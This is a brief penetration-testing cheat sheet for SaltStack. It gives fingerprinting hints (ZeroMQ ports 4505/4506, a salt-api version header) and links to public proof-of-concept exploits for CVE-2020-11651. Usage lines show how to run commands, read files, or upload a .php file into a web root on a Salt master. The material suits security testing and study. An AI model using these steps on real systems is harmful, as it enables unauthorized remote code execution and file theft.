# saltstack

## Interesting Paths

```bash
# identifier ports
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0

# identity via header
salt-api/3000-1
```

## SaltStack 3000.1

```
https://github.com/jasperla/CVE-2020-11651-poc
python3 exploit.py --master IP [--exec CMD] [-r READ_FILE]
upload file: --upload-src .php --upload-dest [absolute path: /var/www/html/.php]

https://github.com/dozernz/cve-2020-11651
```